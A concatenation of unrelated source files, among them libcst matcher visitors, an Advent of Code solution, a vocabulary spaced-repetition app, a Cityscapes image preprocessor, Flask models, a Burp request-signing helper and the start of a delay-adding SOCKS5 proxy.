self._matchers = _visit_matchers(self._matchers, node)
# Now, call any visitors that were hooked using a visit decorator.
_visit_constructed_funcs(self._extra_visit_funcs, self._matchers, node)
# Now, evaluate whether this current function has any matchers it requires.
if not _should_allow_visit(
self._matchers, getattr(self, f"visit_{type(node).__name__}", None)
):
# We shouldn't visit this directly. However, we should continue
# visiting its children.
return True
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
return CSTTransformer.on_visit(self, node)
def on_leave(
self, original_node: _CSTNodeT, updated_node: _CSTNodeT
) -> Union[_CSTNodeT, cst.RemovalSentinel]:
# First, evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers, getattr(self, f"leave_{type(original_node).__name__}", None)
):
retval = CSTTransformer.on_leave(self, original_node, updated_node)
else:
retval = updated_node
# Now, call any visitors that were hooked using a leave decorator.
for matcher, leave_funcs in reversed(list(self._extra_leave_funcs.items())):
if not matches(original_node, matcher):
continue
for leave_func in leave_funcs:
if _should_allow_visit(self._matchers, leave_func) and isinstance(
retval, cst.CSTNode
):
retval = leave_func(original_node, retval)
# Now, see if we have any matchers we should deactivate.
self._matchers = _leave_matchers(self._matchers, original_node)
# pyre-ignore The return value of on_leave is subtly wrong in that we can
# actually return any value that passes this node's parent's constructor
# validation. Fixing this is beyond the scope of this file, and would involve
# forcing a lot of ensure_type() checks across the codebase.
return retval
def on_visit_attribute(self, node: cst.CSTNode, attribute: str) -> None:
# Evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers,
getattr(self, f"visit_{type(node).__name__}_{attribute}", None),
):
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
return CSTVisitor.on_visit_attribute(self, node, attribute)
def on_leave_attribute(self, original_node: cst.CSTNode, attribute: str) -> None:
# Evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers,
getattr(self, f"leave_{type(original_node).__name__}_{attribute}", None),
):
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
CSTVisitor.on_leave_attribute(self, original_node, attribute)
def _transform_module_impl(self, tree: cst.Module) -> cst.Module:
return tree.visit(self)
class MatcherDecoratableVisitor(CSTVisitor):
"""
This class provides all of the features of a :class:`libcst.CSTVisitor`, and
additionally supports various decorators to control when methods get called
when traversing a tree. Use this instead of a :class:`libcst.CSTVisitor` if
you wish to do more powerful decorator-based visiting.
"""
def __init__(self) -> None:
CSTVisitor.__init__(self)
# List of gating matchers that we need to track and evaluate. We use these
# in conjuction with the call_if_inside and call_if_not_inside decorators
# to determine whether or not to call a visit/leave function.
self._matchers: Dict[BaseMatcherNode, Optional[cst.CSTNode]] = {
m: None for m in _gather_matchers(self)
}
# Mapping of matchers to functions. If in the course of visiting the tree,
# a node matches one of these matchers, the corresponding function will be
# called as if it was a visit_* method.
self._extra_visit_funcs: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = _gather_constructed_visit_funcs(self)
# Mapping of matchers to functions. If in the course of leaving the tree,
# a node matches one of these matchers, the corresponding function will be
# called as if it was a leave_* method.
self._extra_leave_funcs: Dict[
BaseMatcherNode, Sequence[Callable[[cst.CSTNode], None]]
] = _gather_constructed_leave_funcs(self)
# Make sure visit/leave functions constructed with @visit and @leave decorators
# have correct type annotations.
_check_types(
self._extra_visit_funcs,
"visit",
expected_param_count=1,
expected_none_return=True,
)
_check_types(
self._extra_leave_funcs,
"leave",
expected_param_count=1,
expected_none_return=True,
)
def on_visit(self, node: cst.CSTNode) -> bool:
# First, evaluate any matchers that we have which we are not inside already.
self._matchers = _visit_matchers(self._matchers, node)
# Now, call any visitors that were hooked using a visit decorator.
_visit_constructed_funcs(self._extra_visit_funcs, self._matchers, node)
# Now, evaluate whether this current function has a decorator on it.
if not _should_allow_visit(
self._matchers, getattr(self, f"visit_{type(node).__name__}", None)
):
# We shouldn't visit this directly. However, we should continue
# visiting its children.
return True
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
return CSTVisitor.on_visit(self, node)
def on_leave(self, original_node: cst.CSTNode) -> None:
# First, evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers, getattr(self, f"leave_{type(original_node).__name__}", None)
):
CSTVisitor.on_leave(self, original_node)
# Now, call any visitors that were hooked using a leave decorator.
for matcher, leave_funcs in reversed(list(self._extra_leave_funcs.items())):
if not matches(original_node, matcher):
continue
for leave_func in leave_funcs:
if _should_allow_visit(self._matchers, leave_func):
leave_func(original_node)
# Now, see if we have any matchers we should deactivate.
self._matchers = _leave_matchers(self._matchers, original_node)
def on_visit_attribute(self, node: cst.CSTNode, attribute: str) -> None:
# Evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers,
getattr(self, f"visit_{type(node).__name__}_{attribute}", None),
):
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
return CSTVisitor.on_visit_attribute(self, node, attribute)
def on_leave_attribute(self, original_node: cst.CSTNode, attribute: str) -> None:
# Evaluate whether this current function has a decorator on it.
if _should_allow_visit(
self._matchers,
getattr(self, f"leave_{type(original_node).__name__}_{attribute}", None),
):
# Either the visit_func doesn't exist, we have no matchers, or we passed all
# matchers. In either case, just call the superclass behavior.
CSTVisitor.on_leave_attribute(self, original_node, attribute)
``` |
{
"source": "JimmyLamothe/autofront",
"score": 2
} |
#### File: autofront/tests/simple_args.py
```python
def foo_args(arg1, arg2, arg3 = 'arg3', arg4 = 'arg4'):
print(arg1, arg2, arg3, arg4)
``` |
{
"source": "jimmy-larsson/advent-of-code",
"score": 4
} |
#### File: days/day1/solution.py
```python
def read_input(file_path: str):
with open(file_path, "r") as file:
return [int(line) for line in file.readlines()]
def part1(inputs: list):
return sum([(mass // 3 - 2) for mass in inputs])
def part2(inputs: list):
mass_total = 0
for mass in inputs:
module_total_mass = 0
fuel_mass = calculate_fuel_cost_from_mass(mass)
while fuel_mass > 0:
module_total_mass += fuel_mass
fuel_mass = calculate_fuel_cost_from_mass(fuel_mass)
mass_total += module_total_mass
return mass_total
def calculate_fuel_cost_from_mass(mass: int):
return mass // 3 - 2
if __name__ == "__main__":
print(f"Part 1: {part1(read_input('input_part1.txt'))}")
print(f"Part 2: {part2(read_input('input_part2.txt'))}")
``` |
{
"source": "jimmylchen/nirvana",
"score": 3
} |
#### File: nirvana/fetch/fetch.py
```python
import requests
# Generic function that calls an HTTP GET request to the endpoint and then uses converter to transform the response to a sensible data model
def fetch(endpoint, converter):
print(f"Fetching from endpoint: {endpoint}")
response = requests.get(endpoint)
return converter(response)
``` |
{
"source": "jimmylee412/Updated-supermemo",
"score": 3
} |
#### File: jimmylee412/Updated-supermemo/backstage.py
```python
import math
import time
import numpy as np
import random
import json
from collections import defaultdict
from datetime import datetime,timedelta
import json
import zidian_1
class caculate():
def __init__(self):
#打开各种json文件
with open('fbdict.json', 'r', encoding='utf-8') as json_file: #打开每次背单词之后记录单词记忆情况的feedbackdictionary
fbdict = json.loads(json_file.read())
self.fbdict = json.loads(fbdict)
with open('messstatus.json', 'r', encoding='utf-8') as json_file: #打开记录单词间混淆情况的messstatus.json
messstatus = json.loads(json_file.read())
self.messstatus = json.loads(messstatus)
with open('status.json', 'r', encoding='utf-8') as json_file: #打开记录各单词以往记忆情况,下次记忆时间的status.json
status = json.loads(json_file.read())
self.status = json.loads(status)
try: #打开单词本文件,避免为空
with open('vocabulary.json', 'r', encoding='utf-8') as json_file:
vocabulary = json.loads(json_file.read())
self.vocabulary = json.loads(vocabulary)
except:
print("单词本中空空如也")
#初始化变量
self.times = 0
self.lastinterval = 0
self.EF = 0
self.q_factor = 0
self.nextdate = 0
self.localtime = time.localtime(time.time())
self.localdate = time.asctime(self.localtime)
#定义函数获得某单词下一次背诵的时间
def getnextdate(self, word, interval,status):
nexttime = time.localtime(time.time() + interval * 86400) #interval是天数
nextdate = str(nexttime.tm_year) + "-" + str(nexttime.tm_mon) + "-" + str(nexttime.tm_mday)
# 如果单词没有背错,就正常地记录下一次的时间。如果背错了,就强制今天再背一次
if status ==0 :
self.status[word][0] = nextdate
elif status ==1:
localtime = time.localtime(time.time())
self.status[word][0] = str(localtime.tm_year) + "-" + str(localtime.tm_mon) + "-" + str(localtime.tm_mday)
#无论是否背错,都要记录单词背过的总次数,和时间间隔。分析需要
self.status[word][1] += 1
self.status[word][2] = interval
# 得到本次记忆与下次记忆的间隔时间
def ginterval(self, times, EF, lastinterval):
if times == 1:
interval = 1
elif times == 2:
interval = 6
else:
interval = lastinterval * EF
interval = int(round(interval))
return interval
# 更新参数 Easiness Factor (EF),此处尽可能还原原软件Super Memo原汁原味的算法
def update(self, oldEF, q_factor):
newEF = oldEF + (0.1 - (5 - q_factor) * (0.08 + (5 - q_factor) * 0.02)) # Easiness Factor 此处照搬原算法函数
if newEF < 1.3: # 避免报错
EF = 1.3
elif newEF > 2.5:
EF = 2.5
else:
EF = newEF
return EF
# 计算分位数的函数
def quantile_p(self, data, p):
a = np.array(data)
try:
Q = np.percentile(a, p)
except:
Q = 0
return Q
#本函数对记忆过程中出错混淆的单词进行预处理
def get_confusing_word(self):
confusing = []
# 对于选择的不是正确选项的单词,把这个fbdict里的meaning替换成单词
for word in list(self.fbdict.keys()):
if self.fbdict[word][0] != "True":
self.fbdict[word] = list(self.fbdict[word]) #原本以tuple的形式记录,转为list,进行替换
origin_word = [x for x, y in self.vocabulary.items() if self.fbdict[word][0] in list(y)] #理论上同个释义可能有多个单词
if len(origin_word) != 0:
del self.fbdict[word][0] #将混淆单词的释义替换为单词
self.fbdict[word].insert(0,origin_word[0])
else:
pass
self.fbdict[word] = tuple(self.fbdict[word]) #转换回tuple
#主要的计算函数,根据每个单词记忆情况更新下一次的时间,更新单词间的混淆关系
def cnt(self): # 计算各单词下次复习时间,更新单词状态
timelist1 = [] # 正确单词的时间list
timelist2 = [] # 错误单词的时间list
for word in list(self.fbdict.keys()): # 得到所有单词记忆的时间,用于后续分析
if self.fbdict[word][0] == "True":
timelist1.append(self.fbdict[word][1])
else:
timelist2.append(self.fbdict[word][1])
# 计算正确单词记忆平均时间
nsum = 0
for i in range(len(timelist1)):
nsum += timelist1[i]
try:
ave_time = nsum / len(timelist1)
except:
ave_time = 0
#对记忆正确的单词,高于平均和低于平均进行分组,用于分析
list_above_ave = []
list_below_ave = []
for time in timelist1:
if time >= ave_time:
list_above_ave.append(time)
if time < ave_time:
list_below_ave.append(time)
Q1 = self.quantile_p(list_below_ave, 50) # 小于平均记忆时间的 时间 的 中位数
Q2 = self.quantile_p(timelist2, 50)
Q3 = self.quantile_p(timelist2, 75)
# requirement and descriptions in Super memo 2 #in our App
# q_factor should be 0-5:
# 5 - perfect response # 5 - 记忆正确,且时间短于低于平均数一组的中位数以下
# 4 - correct response after a hesitationw # 4 - 记忆正确,时间介于低于平均数一组中位数以上
# 3 - correct response recalled with serious difficulty # 3 - 记忆正确,时间高于正确组平均数
# 2 - incorrect response; where the correct one seemed easy to recall # 2 - 回答错误,时间高于66分位数
# 1 - incorrect response; the correct one remembered # 1 - 回答错误,时间在33.3-66.6分位之间
# 0 - complete blackout. # 0 - 回答错误,时间低于33.3分位
# q_factor 更新
for word in list(self.fbdict.keys()):
if word in self.status:
pass
else:
self.status[word] = ["", 0, 1, 2.5] # 初始化水平
#读取文件记录的上一次的总背诵次数,旧的EF数据,旧的时间间隔,用于分析
times = self.status[word][1]
oldEF = self.status[word][3]
lastinterval = self.status[word][2]
# 打分 更新q_factor
if self.fbdict[word][0] == "True":
if self.fbdict[word][1] <= ave_time: # 相当于SM算法中q_factor的4/5分,根据反应时间来分配这两个评分
if self.fbdict[word][1] <= Q1:
self.q_factor = 5
else:
self.q_factor = 4
if self.fbdict[word][1] > ave_time:
self.q_factor = 3
status = 0
else: # 更新易混词,并计算错误时的q_factor 0,1,2
self.get_confusing_word() # 替换成单词
word_f = self.fbdict[word][0]
# 统一小数位数
word_t_str = str(self.fbdict[word][1])
a, b, c = word_t_str.partition(".")
word_t = float(".".join([a, c[:2]]))
# 更新混淆单词,将用户在背单词的时候出现的错误记录下来,混淆“程度”是以时间倒数来评价。时间越短,越“不假思索”,混淆越严重
if word in self.messstatus:
if word_f in self.messstatus[word]:
self.messstatus[word][word_f] += round(math.log(1 + 1 / word_t),2)
else:
self.messstatus[word][word_f] = round(math.log(1 + 1 / word_t),2)
else:
self.messstatus[word] = {}
self.messstatus[word][word_f] = round(math.log(1 + 1 / word_t),2)
sorted(self.messstatus[word],reverse=True) #把单词按照混乱程度划分 方便后面根据这个排序
# 更新q_factor,如果记忆错误,分配0\1\2三个评分
if self.fbdict[word][1] > Q2:
self.q_factor = 0
elif self.fbdict[word][1] < Q2 and self.fbdict[word][1] > Q3:
self.q_factor = 2
elif self.fbdict[word][1] < Q3:
self.q_factor = 1
#如果单词出现错误,强行从头再来,今天重复记忆
lastinterval = 1
status = 1
# 更新status dictionary,把该单词下次的记忆时间写入
EF = self.update(oldEF, self.q_factor)
self.status[word][3] = EF #更新EF
if lastinterval != 1: #当单词记忆错误的时候,要重新开始记忆
interval = self.ginterval(times, EF, lastinterval)
else:
interval = self.ginterval(times, 1, lastinterval)
self.getnextdate(word, interval,status)
#调用函数将所有更改储存下来
self.store()
#将背单词途中手动输入的,联想到的单词记录下来。如果没有手动添加易混单词的话,这个函数不会被使用
def add_new_word(self,fbdict2):
for word, word_list in list(fbdict2.items()):
try: #将单词对应的 手动输入混淆单词列表导入函数 得到一个对应的dictionary
meaningdict = zidian_1.add_word(word_list) #得到新添加的单词及其对应的含义{word:[meaning]} #这个字典里只会有找到释义的单词
except:
print("出现未知错误")
pass
else:
for word2 in list(meaningdict.keys()):
#将手动输入的混淆单词添加到单词本中
if word2 in self.vocabulary.keys():
pass
else:
self.vocabulary.update({word2: meaningdict[word2]})
#将手动输入的混淆单词加入单词的混淆单词字典中
if word in self.messstatus: #如果之前记忆错误过
if word2 in self.messstatus[word]: #如果之前就错过这个单词
self.messstatus[word][word2] = 100
else:
self.messstatus[word][word2] = 100 #任意设定时间,确保这个单词能排在最前面,在复习完单词后优先复习这个单词
else:
self.messstatus[word] = {word2:100}
self.store()
#储存函数
def store(self):
json_fbdict = json.dumps(self.fbdict, sort_keys=False, ensure_ascii= False)
json_messstatus = json.dumps(self.messstatus,sort_keys=False, ensure_ascii= False)
json_status = json.dumps(self.status,sort_keys=False, ensure_ascii= False)
json_vocabulary = json.dumps(self.vocabulary, sort_keys=False, ensure_ascii=False)
with open('fbdict.json', 'w', encoding='utf-8') as json_file:
json.dump(json_fbdict, json_file, ensure_ascii= False)
with open('messstatus.json', 'w', encoding='utf-8') as json_file:
json.dump(json_messstatus, json_file, ensure_ascii=False)
with open('status.json', 'w', encoding='utf-8') as json_file:
json.dump(json_status, json_file, ensure_ascii=False)
with open('vocabulary.json', 'w', encoding='utf-8') as json_file:
json.dump(json_vocabulary, json_file, ensure_ascii=False)
#根据ui反馈的localtime 得到今次复习的单词list, 并调整单词顺序,分配单词释义
class randomize():
def __init__(self):
self.today_word_list = []
#打开各种json文件
with open('messstatus.json', 'r', encoding='utf-8') as json_file:
messstatus = json.loads(json_file.read())
self.messstatus = json.loads(messstatus)
with open('status.json', 'r', encoding='utf-8') as json_file:
status = json.loads(json_file.read())
self.status = json.loads(status)
try:
with open('vocabulary.json', 'r', encoding='utf-8') as json_file:
vocabulary = json.loads(json_file.read())
self.vocabulary = json.loads(vocabulary)
except:
print("单词本中空空如也")
#调用函数获得今天
def get_today_word_list(self):
localtime = time.localtime(time.time())
localdate = str(localtime.tm_year) + "-" + str(localtime.tm_mon) + "-" + str(localtime.tm_mday)
lyear = localtime.tm_year
lmon = localtime.tm_mon
lday = localtime.tm_mday
new_word = 1
#每一个单词都会有对应的status.json文件
for word in list(self.status.keys()):
try:
a,b,c = self.status[word][0].split("-")
except: #避免可能出现的时间缺失情况,虽然机率小,但毕竟存在时间为空的情况。
a,b,c = [9999,9999,9999]
#判断今天是否需要记忆
if int(a) != 2000:
if lyear >= int(a) and lmon >= int(b) and lday >= int(c):
self.today_word_list.append(word)
else:
pass
#在两种导入方式中,新导入的的单词都会初始化成2000-1-1,每天可以设置新单词的数量。
elif int(a) == 2000 and new_word <= 5: #测试用,后面要改成20
self.today_word_list.append(word)
new_word += 1
#将每天生成的单词都打乱
random.shuffle(self.today_word_list)
# 本函数目的在于将单词排序,并将混淆词汇放在一起
def sort(self):
for word in self.today_word_list:
if word in list(self.messstatus.keys()): #判断是否有混淆单词
messlist = list(self.messstatus[word].keys()) #得到混淆单词列表。
for word2 in messlist:
if word2 in self.today_word_list: #判断混淆单词在不在今天要背的单词列表里
self.today_word_list.remove(word2)
self.today_word_list.insert( self.today_word_list.index(word) + 1 , word2) #插入到混淆单词的后边
else:
pass
def get_meaning(self):
self.get_today_word_list()
self.sort()
today_word_dict = {}
meaninglist = []
list1 = list(self.vocabulary.keys())
for word in self.today_word_list:
meaninglist = []
#随机生成四个meanings,并去除要背的单词本身的释义
list2 = [x for x in list1 if x!=word]
random.shuffle(list2) #随机得到单词及其释义
m1, m2, m3, m4 = self.vocabulary[list2[0]][0], \
self.vocabulary[list2[1]][0], \
self.vocabulary[list2[2]][0], \
self.vocabulary[list2[3]][0]
meaninglist.insert(0,self.vocabulary[word][0]) #插入真实释义
#补充迷惑释义
if word in self.messstatus: #存在迷惑单词
messlist = list(self.messstatus[word].keys())
meaninglist.insert(1,self.vocabulary[messlist[0]][0]) #插入第一个迷惑释义
meaninglist.insert(2, m3)
meaninglist.insert(3, m2)
if len(messlist) == 2:
meaninglist.insert(2,self.vocabulary[messlist[1]][0])
meaninglist.insert(3,m2)
elif len(messlist) >= 3:
meaninglist.insert(2, self.vocabulary[messlist[1]][0])
meaninglist.insert(3,self.vocabulary[messlist[2]][0])
today_word_dict[word] = tuple(meaninglist)
else:
meaninglist.insert(1,m1)
meaninglist.insert(2,m2)
meaninglist.insert(3,m3)
today_word_dict[word] = tuple(meaninglist)
return today_word_dict
```
#### File: jimmylee412/Updated-supermemo/Chinadaily.py
```python
import json
import random
def getlinks():
with open('fbdict.json', 'r', encoding='utf-8') as json_file:
fbdict2 = json.loads(json_file.read())
fbdict = json.loads(fbdict2)
wordlist = list(fbdict.keys())
print(len(wordlist))
with open('link.json', 'r', encoding='utf-8') as json_file:
link2 = json.loads(json_file.read())
link_ori = json.loads(link2)
links = {}
for word in list(link_ori.keys()): #生成了一个所有单词对应的文章列表构成的dictionary 得到链接中含有的单词
for alink in link_ori[word]:
if alink not in list(links.keys()):
links[alink] = [word]
else:
links[alink].append(word)
article = []
for link in [a for a in list(links.keys()) if len(links[a]) > 1]: #超过一个单词的链接
if set(links[link]).issubset(set(wordlist)): #如果这个link里面的单词都在今天的wordlist里
article.append(link)
print("a")
for word in links[link]:
wordlist.remove(word)
for link in [a for a in list(links.keys()) if len(links[a]) > 1]:
if len(set(links[link]) & set(wordlist)) >1:
article.append(link)
for word in list(set(links[link]) & set(wordlist)):
wordlist.remove(word)
for word in wordlist: #这些匹配剩下的单词只能用单篇文章填补
try:
random.shuffle(link_ori[word])
article.append(link_ori[word][0])
except:
print("这个单词没有更新文章列表",word)
articledic = {}
for word in wordlist:
if word in list(link_ori.keys()) and len(list(set(link_ori[word]) & set(article)))>0:
articledic[word] = list(set(link_ori[word]) & set(article))[0] #今日链接列表和单词对应的链接列表,只有可能有一个元素
else:
articledic[word] = ""
return article, articledic
``` |
{
"source": "jimmyLeeMc/NeuralNetworkTesting",
"score": 3
} |
#### File: jimmyLeeMc/NeuralNetworkTesting/IMDB.py
```python
import tensorflow as tf
import numpy as np
from tensorflow import keras
from keras import layers
from keras.datasets import imdb
(train_data,train_labels),(test_data,test_labels) = imdb.load_data(num_words=10000)
activations = [layers.core.Activation(keras.activations.sigmoid),
layers.core.Activation(keras.activations.relu), layers.LeakyReLU(),
layers.core.Activation(keras.activations.tanh)]
res=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
a=0
def vectorize_sequences(sequences,dimension=10000):
results = np.zeros((len(sequences),dimension))
for i,sequence in enumerate(sequences):
results[i,sequence] = 1
return results
m=0
for a in range(4):
for b in range(4):
losssum=0
for c in range(6):
print(f'{a} , {b} , {c}')
x_train = vectorize_sequences(train_data)
x_test = vectorize_sequences(test_data)
y_train = np.asarray(train_labels).astype('float32')
y_test = np.asarray(test_labels).astype('float32')
x_val=x_train[:10000]
partial_x_train=x_train[10000:]
y_val=y_train[:10000]
partial_y_train=y_train[10000:]
from keras import models from keras import layers
model=models.Sequential()
model.add(layers.Dense(16, input_shape=(10000,)))
model.add(activations[i])
model.add(layers.Dense(1))
model.add(activations[j])
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['acc'])
history=model.fit(partial_x_train, partial_y_train, epochs=5,batch_size=512, validation_data=(x_val,y_val))
losssum=losssum+history.history['val_loss'][len(history.history['val_loss'])-1]
print(res)
``` |
{
"source": "jimmylin1017cs/enet-pytorch",
"score": 3
} |
#### File: jimmylin1017cs/enet-pytorch/image_preprocess.py
```python
import numpy as np
import cv2
import os
import argparse
from tqdm import tqdm
# define cityscape id to train id
id_to_train_id_map = {
0:19,
1:19,
2:19,
3:19,
4:19,
5:19,
6:19,
7:0,
8:1,
9:19,
10:19,
11:2,
12:3,
13:4,
14:19,
15:19,
16:19,
17:5,
18:19,
19:6,
20:7,
21:8,
22:9,
23:10,
24:11,
25:12,
26:13,
27:14,
28:15,
29:19,
30:19,
31:16,
32:17,
33:18,
-1:-1,
}
# create the function to map train id
id_to_train_id_map_func = np.vectorize(id_to_train_id_map.get)
def create_output_image_path(output_image_path):
if not os.path.exists(output_image_path):
os.makedirs(output_image_path)
if not os.path.exists(output_image_path + 'train'):
os.makedirs(output_image_path + 'train')
if not os.path.exists(output_image_path + 'trainannot'):
os.makedirs(output_image_path + 'trainannot')
if not os.path.exists(output_image_path + 'val'):
os.makedirs(output_image_path + 'val')
if not os.path.exists(output_image_path + 'valannot'):
os.makedirs(output_image_path + 'valannot')
if not os.path.exists(output_image_path + 'test'):
os.makedirs(output_image_path + 'test')
if not os.path.exists(output_image_path + 'testannot'):
os.makedirs(output_image_path + 'testannot')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-iptr', '--input-path-train',
type=str,
default='./cityscapes/train/',
help='The path to the train input dataset')
parser.add_argument('-lptr', '--label-path-train',
type=str,
default='./cityscapes/trainannot/',
help='The path to the train label dataset')
parser.add_argument('-ipv', '--input-path-val',
type=str,
default='./cityscapes/val/',
help='The path to the val input dataset')
parser.add_argument('-lpv', '--label-path-val',
type=str,
default='./cityscapes/valannot/',
help='The path to the val label dataset')
parser.add_argument('-iptt', '--input-path-test',
type=str,
default='./cityscapes/test/',
help='The path to the test input dataset')
parser.add_argument('-lptt', '--label-path-test',
type=str,
default='./cityscapes/testannot/',
help='The path to the test label dataset')
parser.add_argument('-oimh', '--output-image-height',
type=int,
default=256,
help='The output image height')
parser.add_argument('-oimw', '--output-image-width',
type=int,
default=512,
help='The output image width')
parser.add_argument('-op', '--output-image-path',
type=str,
default='./cityscapes_preprocess/',
help='The path to the output dataset')
args = parser.parse_args()
input_path_train = args.input_path_train
label_path_train = args.label_path_train
input_path_val = args.input_path_val
label_path_val = args.label_path_val
input_path_test = args.input_path_test
label_path_test = args.label_path_test
output_image_height = args.output_image_height # (the height all images fed to the model will be resized to)
output_image_width = args.output_image_width # (the width all images fed to the model will be resized to)
output_image_path = args.output_image_path
number_of_classes = 20 # (number of object classes (road, sidewalk, car etc.))
# create all output image directories
create_output_image_path(output_image_path)
'''
print(input_path_train)
print(label_path_train)
print(input_path_val)
print(label_path_val)
print(input_path_test)
print(label_path_test)
print(output_image_height)
print(output_image_width)
print(output_image_path)
'''
if os.path.exists(input_path_train) and os.path.exists(label_path_train):
input_train_names = os.listdir(input_path_train)
input_train_names.sort()
label_train_names = os.listdir(label_path_train)
label_train_names.sort()
for i in tqdm(range(len(input_train_names))):
input_train_image_path = input_path_train + input_train_names[i]
input_train_image = cv2.imread(input_train_image_path)
input_train_image = cv2.resize(input_train_image, (output_image_width, output_image_height), interpolation=cv2.INTER_NEAREST)
label_train_image_path = label_path_train + label_train_names[i]
label_train_image = cv2.imread(label_train_image_path, cv2.IMREAD_GRAYSCALE)
label_train_image = cv2.resize(label_train_image, (output_image_width, output_image_height), interpolation=cv2.INTER_NEAREST)
label_train_image = id_to_train_id_map_func(label_train_image)
cv2.imwrite(output_image_path + 'train/' + input_train_names[i], input_train_image)
cv2.imwrite(output_image_path + 'trainannot/' + label_train_names[i], label_train_image)
else:
print("The path to the train dataset not exist")
if os.path.exists(input_path_val) and os.path.exists(label_path_val):
input_val_names = os.listdir(input_path_val)
input_val_names.sort()
label_val_names = os.listdir(label_path_val)
label_val_names.sort()
for i in tqdm(range(len(input_val_names))):
input_val_image_path = input_path_val + input_val_names[i]
input_val_image = cv2.imread(input_val_image_path)
input_val_image = cv2.resize(input_val_image, (output_image_width, output_image_height), interpolation=cv2.INTER_NEAREST)
label_val_image_path = label_path_val + label_val_names[i]
label_val_image = cv2.imread(label_val_image_path, cv2.IMREAD_GRAYSCALE)
label_val_image = cv2.resize(label_val_image, (output_image_width, output_image_height), interpolation=cv2.INTER_NEAREST)
label_val_image = id_to_train_id_map_func(label_val_image)
cv2.imwrite(output_image_path + 'val/' + input_val_names[i], input_val_image)
cv2.imwrite(output_image_path + 'valannot/' + label_val_names[i], label_val_image)
else:
print("The path to the val dataset not exist")
if os.path.exists(input_path_test) and os.path.exists(label_path_test):
pass
else:
print("The path to the test dataset not exist")
``` |
{
"source": "ji-mmyliu/lyonhacks-web-dev-workshop",
"score": 3
} |
#### File: lyonhacks-web-dev-workshop/flask_site/models.py
```python
from flask_site import db, login_manager
from datetime import datetime
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key = True)
username = db.Column(db.String(20), unique = True, nullable = False)
password = db.Column(db.String(20), nullable = False)
tasks = db.relationship("Task", backref = "owner", lazy = True)
def __repr__(self):
return f"(id: {self.id}, username: {self.username}, password: {self.password})"
class Task(db.Model):
id = db.Column(db.Integer, primary_key = True)
content = db.Column(db.Text, nullable = False)
date_created = db.Column(db.DateTime, nullable = False, default = datetime.now())
owner_id = db.Column(db.Integer, db.ForeignKey("user.id"))
def __repr__(self):
return f"({self.id}, {self.content}, {self.date_created}, {self.owner})"
``` |
{
"source": "jimmy-ly00/burp-extensions",
"score": 3
} |
#### File: burp-extensions/burp-external-crypto-header/sign.py
```python
import sys
import base64
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
def encrypt_text(StringToSign):
key = RSA.importKey(open('./private-key.pem').read())
h = SHA256.new(StringToSign.encode("utf-8"))
signature = pkcs1_15.new(key).sign(h)
return base64.b64encode(signature).decode("utf-8")
def main():
result = encrypt_text(sys.argv[1])
print(result)
if __name__ == "__main__":
main()
``` |
{
"source": "jimmy-ly00/mlsocks",
"score": 3
} |
#### File: jimmy-ly00/mlsocks/mlsocks.py
```python
import socket
import sys
import select
import SocketServer
import struct
import fcntl
import termios
import array
import time
import random
from math import log, exp, ceil
from gevent import sleep, spawn, select
from gevent.pool import Group
BUF_SIZE = 512
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass
class Socks5Server(SocketServer.StreamRequestHandler):
def delay_message(self, message, delay, current_target):
sleep(delay)
#print("New delay: {}".format(delay))
current_target.send(message)
def calculate_delay(self, prev):
# Generate random number from truncated exponential distribution
u = random.SystemRandom().random()
lam = 1 # mean
tau = 15 # maximum bound
delay = -log(1 - (1 - exp(-lam * tau)) * u) / lam
timestamp = time.time() * 1000
new = timestamp + delay * 1000
# Stops messages overtaking each other by checking against the latest delay
if prev[0] < new:
prev[0] = new
prev[1] = delay
else:
delay = prev[1]
return delay
def handle_tcp(self, sock, remote):
fdset = [sock, remote]
tasks = Group()
prev = [0, 0]
sock_switch = remote_switch = 0
sock_counter = remote_counter = 0
sock_count = remote_count = 0
sock_size = array.array('i', [0])
remote_size = array.array('i', [0])
while True:
r, w, e = select.select(fdset, [], [])
# Problem is knowing beforehand when the socket is going to switch to joinall remainding tasks
# FIONREAD will check size of available bytes of the socket to catch the last send()/recv()
if sock in r:
if sock_switch == 0:
fcntl.ioctl(sock, termios.FIONREAD, sock_size, True)
sock_count = ceil(sock_size[0] / float(BUF_SIZE))
print("sock", sock_size[0], sock_count)
sock_switch = 1
delay = self.calculate_delay(prev)
sock_buf = sock.recv(BUF_SIZE)
#print(sock_buf)
if sock_buf is None or sock_buf == "": break
tasks.spawn(self.delay_message, sock_buf, delay, remote)
sock_counter += 1
if remote in r:
if remote_switch == 0:
fcntl.ioctl(remote, termios.FIONREAD, remote_size, True)
remote_count = ceil(remote_size[0] / float(BUF_SIZE))
print("remote", remote_size[0], remote_count)
remote_switch = 1
delay = self.calculate_delay(prev)
remote_buf = remote.recv(BUF_SIZE)
#print(remote_buf)
if remote_buf is None or remote_buf == "": break
tasks.spawn(self.delay_message, remote_buf, delay, sock)
remote_counter += 1
# Wait for last task before switching socket
if sock_count == sock_counter and sock_switch == 1:
print("joiningsocks")
tasks.join()
sock_counter = sock_switch = 0
if remote_count == remote_counter and remote_switch == 1:
print("joiningremote")
tasks.join()
remote_counter = remote_switch = 0
def handle(self):
try:
print 'socks connection from ', self.client_address
sock = self.connection
# 1. Version
sock.recv(262)
sock.send(b"\x05\x00")
# 2. Request
data = self.rfile.read(4)
mode = ord(data[1])
addrtype = ord(data[3])
if addrtype == 1: # IPv4
